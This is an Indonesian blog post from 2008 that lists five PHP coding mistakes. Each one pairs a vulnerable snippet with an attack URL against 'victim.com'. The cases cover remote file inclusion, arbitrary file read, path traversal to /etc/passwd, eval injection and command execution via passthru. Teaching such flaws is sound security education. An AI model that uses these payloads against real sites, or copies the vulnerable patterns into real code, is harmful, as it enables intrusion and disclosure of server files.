RSS : Articles / Comments

Fatal error penulisan skrip php

Selasa, September 23, 2008, Posted by Akbar a.k.a p4rcomX, No Comment

Beberapa kesalahan penulisan scripts php yang dapat berakibat fatal.

======
case 1
======
[scripts]
$page = $_GET[page];
include($page);

[attack]
http://victim.com/file.php?page=[Inection URL]


======
case 2
======
[scripts]
header( "Content-Type: application/octet-stream" );
header( "Content-Length: " . filesize($_GET['file'] ) );
header( "Content-Disposition: inline; filename=\"$_GET[file]\"");
readfile($_GET['file'] );

[attack]
http://victim.com/file.php?file=index.php


=======
case 3
=======
[scripts]
$fp = fopen("/path/{$_GET['filename']}.txt", 'r');

[attack]
http://victim.com/file.php?filename=../../../etc/passwd


======
case 4
======
[scripts]
eval($_GET[ev]);

[attack]
http://victim.com/file.php?ev=include($_GET[irv]);&irv=[injection URL]


==========
case 5
==========
[scripts]
passthru($_GET[cmd]);

[attack]
http://victim.com/file.php?cmd=ls -al

(Repost From Irvian Blog)

No Comment

Posting Komentar